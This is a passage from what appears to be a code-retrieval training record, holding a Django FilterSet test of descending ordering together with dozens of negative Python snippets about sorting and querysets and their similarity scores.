response.data['detail']", "def sort_on(self):\n if \"sortOn\" in self._prop_dict:\n return self._prop_dict[\"sortOn\"]\n else:\n return None", "def list(self, request, *args, **kwargs):\n self.order_queryset = True\n if 'ordering' in request.query_params.keys():\n self.order_queryset = False\n return super(ReleaseViewSet, self).list(request, *args, **kwargs)", "def queryset(self, request):\n qs = self.model.all_objects.get_query_set()\n ordering = self.ordering or ()\n if ordering:\n qs = qs.order_by(*ordering)\n return qs", "def setSearchFieldnames(self, fieldnames):\n self._search_fieldnames = fieldnames", "def sort_order(self, sort_order):\n\n self._sort_order = sort_order", "def setFieldNames(self, model, lyr): \n #get the fields\n fields = lyr.pendingFields()\n position = 0\n \n #set column names\n for field in fields:\n model.setHorizontalHeaderItem(position, QStandardItem(field.name()))\n position+=1", "def get_queryset(self, request):\n querys = self.model.all_objects.get_queryset()\n ordering = self.get_ordering(request)\n if ordering:\n querys = querys.order_by(*ordering)\n return querys", "def default_sort_column(self, default_sort_column):\n\n self._default_sort_column = default_sort_column", "def get_sort_query(self, kind, order, is_number):\n pass", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def order_by_as_sql(self):\n return comma_join([\n '%s DESC' % field[1:] if isinstance(field, str) and field[0] == '-' else str(field)\n for field in self._order_by\n ])", "def order_by(self, list_or_name):\n if not isinstance(list_or_name, basestring):\n for c in list_or_name:\n self.order_by(c)\n else:\n self._orderby_conds.append(list_or_name)\n\n return self" ]
[ "0.7114981", "0.6805322", "0.65821075", "0.6384245", "0.6316189", "0.6254384", "0.6160399", "0.60926193", "0.59577346", "0.59503293", "0.59400135", "0.5909272", "0.5759706", "0.57583076", "0.57493776", "0.5726326", "0.5716653", "0.571355", "0.5712792", "0.5647503", "0.5642596", "0.5628735", "0.56165737", "0.55814326", "0.55741805", "0.55557436", "0.5532448", "0.5529606", "0.5519835", "0.5511644", "0.5485929", "0.5465671", "0.54204506", "0.5419675", "0.54087925", "0.5402096", "0.5371906", "0.53660154", "0.53618526", "0.5359104", "0.5352894", "0.5334281", "0.5329987", "0.5329112", "0.5325092", "0.53136086", "0.5311685", "0.5303327", "0.5302453", "0.52917993", "0.52610624", "0.52568024", "0.52540207", "0.52511346", "0.522411", "0.52015024", "0.51937896", "0.5186127", "0.51592165", "0.5133022", "0.5132554", "0.510349", "0.50978875", "0.509699", "0.5087841", "0.5079201", "0.5072474", "0.5072194", "0.5070364", "0.5067101", "0.5014353", "0.5012664", "0.50006074", "0.49766332", "0.49702168", "0.49586567", "0.495488", "0.49414554", "0.49271742", "0.49263468", "0.49259594", "0.49211022", "0.49133986", "0.48979747", "0.48888963", "0.48784864", "0.48675054", "0.48620343", "0.48601866", "0.4846724", "0.48267564", "0.48263326", "0.48251227", "0.48155618", "0.48122683", "0.4795051", "0.47769246", "0.47763884", "0.47747236", "0.4774328" ]
0.7341014
0
Test ordering descending works when order_by=True.
def test_ordering_descending_unset(self): class F(FilterSet): class Meta: model = User fields = ['username', 'status'] order_by = True f = F({'o': '-username'}, queryset=self.qs) self.assertQuerysetEqual( f.qs, ['jacob', 'carl', 'alex', 'aaron'], lambda o: o.username)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_orderby(self):\n\n # TODO: make a unit test out of these various combinations\n #m = mapper(User, users, order_by=desc(users.c.user_name))\n mapper(User, users, order_by=None)\n #mapper(User, users)\n\n #l = create_session().query(User).select(order_by=[desc(users.c.user_name), asc(users.c.user_id)])\n l = create_session().query(User).all()\n #l = create_session().query(User).select(order_by=[])\n #l = create_session().query(User).select(order_by=None)", "def orderby():\n pass", "def test_ordering_by_price_desc(self):\n request = self.factory.get('/api/v1/cars', {'distance': 10000,\n 'ordering': '-price'})\n response = CarAdViewSet.as_view({'get': 'list'})(request)\n self.assertEqual(response.status_code, HTTPStatus.OK._value_)\n cars = response.data['results'][0:2]\n self.assertGreater(cars[0]['price'], cars[1]['price'])\n self.assertNotEqual(cars[0], cars[1])", "def is_descending(self):\n return self._tag == 'descending'", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names == [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def testSortDescending(self):\n self.request.GET['sort'] = \"-name\"\n self.datagrid.load_state()\n\n self.assertEqual(self.datagrid.sort_list, [\"-name\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 99\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 98\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 97\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def is_descending(self):\r\n return self.startswith('-')", "def testSortNoDbDescending(self):\n self.request.GET['sort'] = \"-custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"-custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 03\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 07\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 11\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def orderby(cls, field, desc=False):\n cls.runtime.set_orderby((field, desc))\n return cls", "def test_ordering_with_overridden_field_name_and_descending(self):\n class F(FilterSet):\n class Meta:\n model = User\n fields = ['username', 'status']\n order_by = ['status', '-status']\n order_by_field = 'order'\n\n f = F().form\n self.assertNotIn('o', f.fields)\n self.assertIn('order', f.fields)\n self.assertEqual(f.fields['order'].choices, [('status', 'Status'), ('-status', 'Status (descending)')])", "def test_get_movies_order_by_rating_desc(self):\n\n r = self.client.get(reverse('movieapi:movies'), {'order_by': 'rating', 'desc': 'true'})\n\n qs = Movie.get_all().order_by('-imdbrating')\n serializer = MovieSerializer(qs, many=True)\n\n self.assertJSONEqual(\n r.content,\n serializer.data\n )\n self.assertEqual(r.status_code, 200)", "def test_subquery_with_order(self):\n with self.patch_schema({}):\n sql = (\n \"SELECT COUNT(*) FROM (\"\n \"SELECT DISTINCT id FROM a ORDER BY id DESC) a\"\n )\n stmt = sqlparse.parse(sql)[0]\n assert True == self.has_order_by_count(stmt)", "def test_sortby_invalid(self):\n qs = {'a': 1, 'w': 4, 'format': 'json', 'sortby': ''}\n response = self.client.get(reverse('search.advanced'), qs)\n eq_(200, response.status_code)", "def test_clear_ordering(self):\n ORDER_BY_KEY, CMD_QUERY_KEY = get_key_compat(self.mongodb_version)\n\n class BlogPost(Document):\n title = StringField()\n published_date = DateTimeField()\n\n meta = {\"ordering\": [\"-published_date\"]}\n\n BlogPost.drop_collection()\n\n # default ordering should be used by default\n with db_ops_tracker() as q:\n BlogPost.objects.filter(title=\"whatever\").first()\n assert len(q.get_ops()) == 1\n assert q.get_ops()[0][CMD_QUERY_KEY][ORDER_BY_KEY] == {\"published_date\": -1}\n\n # calling order_by() should clear the default ordering\n with db_ops_tracker() as q:\n BlogPost.objects.filter(title=\"whatever\").order_by().first()\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]\n\n # calling an explicit order_by should use a specified sort\n with db_ops_tracker() as q:\n BlogPost.objects.filter(title=\"whatever\").order_by(\"published_date\").first()\n assert len(q.get_ops()) == 1\n assert q.get_ops()[0][CMD_QUERY_KEY][ORDER_BY_KEY] == {\"published_date\": 1}\n\n # calling order_by() after an explicit sort should clear it\n with db_ops_tracker() as q:\n qs = BlogPost.objects.filter(title=\"whatever\").order_by(\"published_date\")\n qs.order_by().first()\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]", "def testSortingReverse(self):\n if self.sortingReverse.lower() in [\"1\", \"yes\", \"true\", \"on\"]:\n self.assertTrue(\n self.config.sortingReverse\n )\n elif self.sortingReverse.lower() in [\"0\", \"no\", \"false\", \"off\"]:\n self.assertFalse(\n self.config.sortingReverse\n )\n else:\n self.assertEqual(\n tools.SORTING_REVERSE_DEFAULT,\n self.config.sortingReverse\n )", "def test_query_sort_nondefault_sort_order(self):\n doc_count = 10\n field_to_be_sorted_by = \"data\"\n prefix = get_rand_string()\n\n data = [prefix + \"-\" + str(x) for x in range(10)]\n\n # Same user_id for all documents\n user_id = get_rand_string()\n\n for datum in data:\n self.conn.add(id=get_rand_string(), user_id=user_id, data=datum)\n self.conn.commit()\n\n results = self.conn.query(q=\"user_id:\" + user_id, sort=\"data\",\n sort_order=\"desc\").results\n\n self.assertEquals(len(results), doc_count,\n \"There should be %d documents returned, got:%d, results:%s\" % (\n doc_count, len(results), results))\n\n query_data = [doc[\"data\"] for doc in results]\n\n for idx, datum in enumerate(reversed(sorted(data))):\n self.assertEquals(datum, query_data[idx],\n \"Expected %s instead of %s on position %s in query_data:%s\" % (\n datum, query_data[idx], idx, query_data))", "def test_get_movies_order_by_title_desc(self):\n\n r = self.client.get(reverse('movieapi:movies'), {'order_by': 'title', 'desc': 'true'})\n\n qs = Movie.get_all().order_by('-title')\n serializer = MovieSerializer(qs, many=True)\n\n self.assertJSONEqual(\n r.content,\n serializer.data\n )\n self.assertEqual(r.status_code, 200)", "def is_ascending(self):\r\n return not self.is_descending", "def test_order_direction(self):\n threads = [make_minimal_cs_thread()]\n self.register_get_user_response(self.user)\n self.register_get_threads_response(threads, page=1, num_pages=1)\n self.client.get(\n self.url,\n {\n \"course_id\": str(self.course.id),\n \"order_direction\": \"desc\",\n }\n )\n self.assert_last_query_params({\n \"user_id\": [str(self.user.id)],\n \"course_id\": [str(self.course.id)],\n \"sort_key\": [\"activity\"],\n \"page\": [\"1\"],\n \"per_page\": [\"10\"],\n })", "def sortby(self):\n ...", "def test_order_by(self, http_query, cc_query):\n threads = [make_minimal_cs_thread()]\n self.register_get_user_response(self.user)\n self.register_get_threads_response(threads, page=1, num_pages=1)\n self.client.get(\n self.url,\n {\n \"course_id\": str(self.course.id),\n \"order_by\": http_query,\n }\n )\n self.assert_last_query_params({\n \"user_id\": [str(self.user.id)],\n \"course_id\": [str(self.course.id)],\n \"page\": [\"1\"],\n \"per_page\": [\"10\"],\n \"sort_key\": [cc_query],\n })", "def test_order_by(self):\n try:\n self.init_pglist_data(self.node)\n\n print(\"Creating index 'rumidx_orderby_sent'\")\n\n self.node.safe_psql(\n \"pglist\",\n \"CREATE INDEX rumidx_orderby_sent ON pglist USING rum (\"\n \" fts rum_tsvector_timestamp_ops, sent) \"\n \" WITH (attach=sent, to=fts, order_by_attach=t)\")\n\n print(\"Running tests\")\n\n self.assertEqual(\n self.node.safe_psql(\n \"pglist\",\n \"SELECT sent, subject \"\n \" FROM pglist \"\n \" WHERE fts @@ \"\n \" to_tsquery('english', 'backend <-> crushed') \"\n \" ORDER BY sent <=| '2016-01-01 00:01' LIMIT 5\"\n ),\n b'1999-06-02 11:52:46|Re: [HACKERS] PID of backend\\n'\n )\n\n self.assertEqual(\n self.node.safe_psql(\n \"pglist\",\n \"SELECT count(*) FROM pglist \"\n \"WHERE fts @@ to_tsquery('english', 'tom & lane')\"\n ),\n b'222813\\n'\n )\n\n self.node.safe_psql(\"pglist\", \"DROP INDEX rumidx_orderby_sent\");\n\n print(\"Creating index 'pglist_rum_idx'\")\n\n self.node.safe_psql(\n \"pglist\",\n \"CREATE INDEX pglist_rum_idx ON pglist USING rum (\"\n \" fts rum_tsvector_ops)\")\n\n print(\"Running tests\")\n\n self.assertEqual(\n self.node.execute(\n \"pglist\",\n \"SELECT id FROM pglist \"\n \"WHERE fts @@ to_tsquery('english', 'postgres:*') \"\n \"ORDER BY fts <=> to_tsquery('english', 'postgres:*') \"\n \"LIMIT 9\"\n )[0][0],\n 816114\n )\n\n # Autovacuum after large update, with active RUM index crashes postgres\n print(\"Test Issue #19\")\n\n self.node.safe_psql(\n \"pglist\",\n \"DELETE FROM pglist WHERE id < 100000\")\n self.node.safe_psql(\n \"pglist\",\n \"vacuum\")\n\n self.node.safe_psql(\"pglist\", \"DROP INDEX pglist_rum_idx\");\n\n except Exception as e:\n self.printlog(os.path.join(self.node.logs_dir, \"postgresql.log\"))\n raise e", "def test_order_by_chaining(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n only_age = self.Person.objects.order_by(\"-age\").only(\"age\")\n\n names = [p.name for p in only_age]\n ages = [p.age for p in only_age]\n\n # The .only('age') clause should mean that all names are None\n assert names == [None, None, None]\n assert ages == [40, 30, 20]\n\n qs = self.Person.objects.all().order_by(\"-age\")\n qs = qs.limit(10)\n ages = [p.age for p in qs]\n assert ages == [40, 30, 20]\n\n qs = self.Person.objects.all().limit(10)\n qs = qs.order_by(\"-age\")\n\n ages = [p.age for p in qs]\n assert ages == [40, 30, 20]\n\n qs = self.Person.objects.all().skip(0)\n qs = qs.order_by(\"-age\")\n ages = [p.age for p in qs]\n assert ages == [40, 30, 20]", "def test_get_entities_no_filter_sort_username_desc(app):\n with app.app_context():\n users = get_entities(User, 1, 5, [],\n dict(column='username', dir='desc'))\n assert users.page == 1\n assert users.per_page == 5\n assert 'ORDER BY users.username DESC' in str(users.query.statement)", "def test_calc_sort_without_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object._calc_sort_value(sort_base_length=3,\n increment=1,\n sort_prefix_parts=[test_object.datum_group.sort]\n )\n expected = 10101\n self.assertEqual(expected, actual)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def test_no_ordering_for_get(self):\n ORDER_BY_KEY, CMD_QUERY_KEY = get_key_compat(self.mongodb_version)\n\n class BlogPost(Document):\n title = StringField()\n published_date = DateTimeField()\n\n meta = {\"ordering\": [\"-published_date\"]}\n\n BlogPost.objects.create(\n title=\"whatever\", published_date=datetime.datetime.utcnow()\n )\n\n with db_ops_tracker() as q:\n BlogPost.objects.get(title=\"whatever\")\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]\n\n # Ordering should be ignored for .get even if we set it explicitly\n with db_ops_tracker() as q:\n BlogPost.objects.order_by(\"-title\").get(title=\"whatever\")\n assert len(q.get_ops()) == 1\n assert ORDER_BY_KEY not in q.get_ops()[0][CMD_QUERY_KEY]", "def order_by(self, field, descending=False):\n self._order_by.append((field, descending))\n return self", "def sort_descending(self):\n # sort_descending_sitem = self.locator_finder_by_idx(self.sort_descending_id)\n # sort_descending_sitem = sort_descending_sitem.find_element_by_xpath(\"./..\")\n # sort_descending_sitem.click()\n # time.sleep(2)\n \n if self.current_package_version() == semver.VersionInfo.parse(\"3.8.0\"):\n sort_by_descending = '//*[@id=\"collectionsDropdown\"]/ul[3]/li[4]/a/label/i'\n sort_descending_sitem = self.locator_finder_by_xpath(sort_by_descending)\n else:\n sort_descending_sitem = self.locator_finder_by_xpath(self.sort_descending_id)\n sort_descending_sitem.click()\n time.sleep(2)", "def test_get_order(self):\n pass", "def test_reversed_version_sorting(self):\n assert natsort(['1', '5', '10', '50'], reverse=True) == ['50', '10', '5', '1']", "def test_list_tasks_order_name_desc(self):\n rv = TEST_CLIENT.post(\"/tasks/list-tasks\", json={\"order\": \"name desc\"})\n result = rv.json()\n\n expected = util.MOCK_TASK_LIST_SORTED_BY_NAME_DESC\n self.assertEqual(result, expected)\n self.assertEqual(rv.status_code, 200)", "def testSortOrder(self):\n timestamp = time.time()\n comment_id1 = Comment.ConstructCommentId(timestamp, 0, 0)\n comment_id2 = Comment.ConstructCommentId(timestamp + 1, 0, 0)\n self.assertGreater(comment_id2, comment_id1)", "def order_by(self, *fields):\n self._evaluated = False\n if self._order is None:\n self._order = []\n\n for field in fields:\n direction = \"asc\"\n if field.startswith('-'):\n direction = \"desc\"\n field = field[1:]\n\n self._order.append({ field : direction })\n\n return self", "def opposite(self):\r\n return OrderBy(self[1:]) if self.is_descending else OrderBy('-' + self)", "def sort(self,desc):\n\tself.__sort(\"\",\"\",desc)", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def test_order_by(self):\n manifestb = job_test_utils.create_seed_manifest(name='scale-batch-creator', jobVersion='2.0.0')\n job_type1b = job_test_utils.create_seed_job_type(manifest=manifestb)\n job_test_utils.create_job(job_type=job_type1b, status='RUNNING')\n\n manifestc = job_test_utils.create_seed_manifest(name='scale-batch-creator', jobVersion='3.0.0')\n job_type1c = job_test_utils.create_seed_job_type(manifest=manifestc)\n job_test_utils.create_job(job_type=job_type1c, status='RUNNING')\n\n url = '/%s/jobs/?is_superseded=false&order=job_type__name&order=-job_type__version' % self.api\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 4)\n\n self.assertEqual(result['results'][0]['job_type']['id'], job_type1c.id)\n self.assertEqual(result['results'][1]['job_type']['id'], job_type1b.id)\n self.assertEqual(result['results'][2]['job_type']['id'], self.job_type1.id)\n self.assertEqual(result['results'][3]['job_type']['id'], self.job_type2.id)", "def test_get_sort_value_without_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object.get_sort_value()\n expected = 10101\n self.assertEqual(expected, actual)", "def reversesort(self):\n ...", "def sort_by(function):\n f = partial(sorted, key=function)\n f.attrs = {'descending': _descending_sort_by(function)}\n return f", "def testSorting(self):\n if self.sorting in tools.SORTINGS:\n self.assertEqual(\n self.sorting,\n self.config.sorting\n )\n else:\n self.assertNotEqual(\n self.sorting,\n self.config.sorting\n )\n self.assertEqual(\n tools.SORTING_DEFAULT,\n self.config.sorting\n )", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in response.data['detail']", "def test_last_sort_value_no_sort_range(self):\n test_object = self.test.datum_type2\n actual = test_object._last_sort_value()\n expected = 20100\n self.assertEqual(expected, actual)", "def test_get_data_with_desc_sort_dir(self, mock_api):\n mock_client = mock_api.muranoclient(mock.Mock())\n mock_client.categories.list.return_value = [\n 'foo_cat', 'bar_cat'\n ]\n self.categories_view.request.GET.get.side_effect = [None, 'bar_marker']\n\n result = self.categories_view.get_data()\n\n expected_categories = ['foo_cat', 'bar_cat']\n expected_kwargs = {\n 'filters': {},\n 'marker': 'bar_marker',\n 'sort_dir': 'desc',\n 'limit': 3\n }\n\n self.assertEqual(expected_categories, result)\n self.assertFalse(self.categories_view.has_more_data(None))\n self.assertTrue(self.categories_view.has_prev_data(None))\n self.categories_view.request.GET.get.assert_has_calls([\n mock.call(tables.CategoriesTable._meta.prev_pagination_param,\n None),\n mock.call(tables.CategoriesTable._meta.pagination_param, None)\n ])\n mock_client.categories.list.assert_called_once_with(\n **expected_kwargs)", "def is_ascending(self):\n return self._tag == 'ascending'", "def test_sort_reversed():\n assert bubble_sort([5, 4, 3, 2, 1]) == [1, 2, 3, 4, 5]", "def user_order_by(self, field):\n # Get ordering model.\n model_label = order.utils.resolve_labels('.'.join(\\\n [self.model._meta.app_label, self.model._meta.object_name]))\n orderitem_set = getattr(self.model, \\\n order.utils.resolve_order_item_related_set_name(model_label))\n order_model = orderitem_set.related.model\n\n # Resolve ordering model table name.\n db_table = order_model._meta.db_table\n\n # Add ordering field as extra queryset fields.\n pk_name = self.model._meta.pk.attname\n\n # If we have a descending query remove '-' from field name when quering.\n sanitized_field = field.lstrip('-')\n\n extra_select = {\n sanitized_field: '(SELECT %s from %s WHERE item_id=%s.%s)' % \\\n (sanitized_field, db_table, self.model._meta.db_table, pk_name)\n }\n\n # Use original field name when ordering to allow for descending.\n return self.extra(select=extra_select).all().order_by(field)", "def desc(self):\n self.get_output = sorted(sorted((value, key) for (key, value) in self.get_output.items()), reverse=True)", "def test_timeline_order_sorted_by_last_comment_publish_date(self):\n from .mockers import user_status, user_comment\n username = 'messi'\n self.create_user(username)\n activity_ids = []\n # Create 7 activities to overpass limit of 5\n for i in range(7):\n activity_ids.append(self.create_activity(username, user_status).json['id'])\n res = self.testapp.post('/activities/%s/comments' % str(activity_ids[0]), json.dumps(user_comment), oauth2Header(username), status=201)\n # Get first 5 results\n res = self.testapp.get('/people/%s/timeline?sortBy=comments&limit=5' % username, \"\", oauth2Header(username), status=200)\n self.assertEqual(len(res.json), 5)\n\n self.assertEqual(res.json[0].get('id', None), activity_ids[0])\n self.assertEqual(res.json[1].get('id', None), activity_ids[6])\n self.assertEqual(res.json[2].get('id', None), activity_ids[5])\n self.assertEqual(res.json[3].get('id', None), activity_ids[4])\n self.assertEqual(res.json[4].get('id', None), activity_ids[3])\n\n # get next 2 results\n res = self.testapp.get('/people/%s/timeline?sortBy=comments&limit=5&before=%s' % (username, activity_ids[3]), \"\", oauth2Header(username), status=200)\n self.assertEqual(len(res.json), 2)\n\n self.assertEqual(res.json[0].get('id', None), activity_ids[2])\n self.assertEqual(res.json[1].get('id', None), activity_ids[1])", "def test_external_comments_order(self, order_by_attr):\n with factories.single_commit():\n control = factories.ControlFactory()\n for _ in range(5):\n comment = factories.ExternalCommentFactory(\n description=factories.random_str()\n )\n factories.RelationshipFactory(source=control, destination=comment)\n request_data = [{\n \"filters\": {\n \"expression\": {\n \"object_name\": \"Control\",\n \"op\": {\n \"name\": \"relevant\"\n },\n \"ids\": [control.id]\n },\n },\n \"object_name\": \"ExternalComment\",\n \"order_by\": [{\"name\": order_by_attr, \"desc\": \"true\"}],\n }]\n\n response = self.api.post(\n comment,\n data=request_data,\n url=\"/query\"\n )\n\n self.assert200(response)\n response_data = response.json[0][\"ExternalComment\"]\n comments = [val[\"description\"] for val in response_data[\"values\"]]\n expected_comments = db.session.query(\n all_models.ExternalComment.description\n ).order_by(\n getattr(all_models.ExternalComment, order_by_attr).desc(),\n all_models.ExternalComment.id.desc(),\n )\n self.assertEqual(comments, [i[0] for i in expected_comments])", "def test_sort_fewer_than_n(self):\n e1 = Experience(rid=1, uid=3, experience=100)\n e2 = Experience(rid=1, uid=1, experience=89)\n e3 = Experience(rid=1, uid=12, experience=1343)\n db.session.add(e1)\n db.session.add(e2)\n db.session.add(e3)\n db.session.commit()\n list = top_n_in_order(1,5)\n self.assertEqual([(12, 1343), (3, 100), (1, 89)], list)", "def test_order_then_filter(self):\n\n class Number(Document):\n n = IntField()\n\n Number.drop_collection()\n\n n2 = Number.objects.create(n=2)\n n1 = Number.objects.create(n=1)\n\n assert list(Number.objects) == [n2, n1]\n assert list(Number.objects.order_by(\"n\")) == [n1, n2]\n assert list(Number.objects.order_by(\"n\").filter()) == [n1, n2]\n\n Number.drop_collection()", "async def test_txn_list_sorted_in_reverse(self):\n paging = Mocks.make_paging_response(0, 3)\n transactions = Mocks.make_txns('2', '1', '0')\n self.stream.preset_response(head_id='2', paging=paging, transactions=transactions)\n\n response = await self.get_assert_200('/transactions?sort=-header_signature')\n page_controls = Mocks.make_paging_controls()\n sorting = Mocks.make_sort_controls(\n 'header_signature', reverse=True)\n self.stream.assert_valid_request_sent(\n paging=page_controls,\n sorting=sorting)\n\n self.assert_has_valid_head(response, '2')\n self.assert_has_valid_link(response,\n '/transactions?head=2&sort=-header_signature')\n self.assert_has_valid_paging(response, paging)\n self.assert_has_valid_data_list(response, 3)\n self.assert_txns_well_formed(response['data'], '2', '1', '0')", "def test_questions_sortby(self):\n QuestionFactory(title=u'tags tags tags')\n\n self.refresh()\n\n # Advanced search for questions with sortby set to 3 which is\n # '-replies' which is different between Sphinx and ES.\n response = self.client.get(reverse('search.advanced'), {\n 'q': 'tags', 'tags': 'desktop', 'w': '2', 'a': '1', 'sortby': '3',\n 'format': 'json'\n })\n\n eq_(200, response.status_code)\n\n content = json.loads(response.content)\n eq_(content['total'], 1)", "def sort(self, desc):\n self.__sortByIndex(0, desc)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def test_sorting_by_priority(self):\n # The sorting link is presents on the page\n order_by = '?order_by=priority'\n self.client.get(reverse('hello:contacts'))\n response = self.client.get(reverse('hello:requests'))\n self.assertIn(order_by, response.content)\n\n # After click on the order_by link webrequests sorting by priority\n for i in range(5):\n self.client.get(reverse('hello:contacts'))\n\n for i in range(1, 6):\n webrequest = DatabaseRequest.objects.get(pk=i)\n webrequest.priority = i\n webrequest.save()\n\n webrequests = DatabaseRequest.objects.all()\n response = self.client.get(reverse('hello:requests')+order_by)\n webrequests = webrequests.order_by('priority')\n\n for i in range(5):\n self.assertEqual(response.context['requests'][i], webrequests[i])\n\n # After another click on the order_by link webrequest reversing\n response = self.client.get(reverse('hello:requests') +\n order_by+'&reverse=true')\n webrequests = webrequests.reverse()\n\n for i in range(5):\n self.assertEqual(response.context['requests'][i], webrequests[i])", "def test_sort_order(self):\n obj = self.conn.search(self.basedn, 2, attrlist=['uidNumber'],\n sort_order=[\"-uidNumber\"])\n sort = [o['uidNumber'][0] for o in obj if 'uidNumber' in o]\n self.assertTrue((all(sort[i] >= sort[i+1]\n for i in range(len(sort)-1))), \"Not sorted\")", "def test_sorting_name(self):\n # Name Decreasing sorting criteria is selected\n sorting_criteria = \"name_decreasing\"\n # Search string that returns all of the users\n search_string = \"''\"\n # Search For all users\n resp = SearchTest.client.get('/api/search/',{\"token\":SearchTest.valid_token,\"search_string\":search_string,\"sorting_criteria\":sorting_criteria})\n search_result = json.loads(resp.content)\n for i in range(len(search_result)-1):\n self.assertGreaterEqual(search_result[i][\"name\"],search_result[i+1][\"name\"],\"{} sorting criteria doesn't work\".format(sorting_criteria))", "def sort_values_descending(self, sort_values_descending):\n\n self._sort_values_descending = sort_values_descending", "def test_calc_sort_with_after_object(self):\n test_object = self.test.datum_type2\n actual = test_object._calc_sort_value(after_object=self.test.datum_type1,\n sort_base_length=3,\n increment=1,\n sort_prefix_parts=[test_object.datum_group.sort]\n )\n expected = 10101\n self.assertEqual(expected, actual)", "def test_ordering(self):\n\n class BlogPost(Document):\n title = StringField()\n published_date = DateTimeField()\n\n meta = {\"ordering\": [\"-published_date\"]}\n\n BlogPost.drop_collection()\n\n blog_post_1 = BlogPost.objects.create(\n title=\"Blog Post #1\", published_date=datetime.datetime(2010, 1, 5, 0, 0, 0)\n )\n blog_post_2 = BlogPost.objects.create(\n title=\"Blog Post #2\", published_date=datetime.datetime(2010, 1, 6, 0, 0, 0)\n )\n blog_post_3 = BlogPost.objects.create(\n title=\"Blog Post #3\", published_date=datetime.datetime(2010, 1, 7, 0, 0, 0)\n )\n\n # get the \"first\" BlogPost using default ordering\n # from BlogPost.meta.ordering\n expected = [blog_post_3, blog_post_2, blog_post_1]\n self.assertSequence(BlogPost.objects.all(), expected)\n\n # override default ordering, order BlogPosts by \"published_date\"\n qs = BlogPost.objects.order_by(\"+published_date\")\n expected = [blog_post_1, blog_post_2, blog_post_3]\n self.assertSequence(qs, expected)", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def test_sort_reversed():\n reverse_sorted_data = [3, 2, 1]\n sorted_data = bubble_sort(reverse_sorted_data)\n assert sorted_data == [1, 2, 3]", "def test_get_entities_ten_no_filter_sort_username_desc(app, add_ten_users):\n with app.app_context():\n add_ten_users()\n users = get_entities(User, 1, 3, [], dict(column='id', dir='desc'))\n assert len(users.items) == 3\n assert users.items[0].id 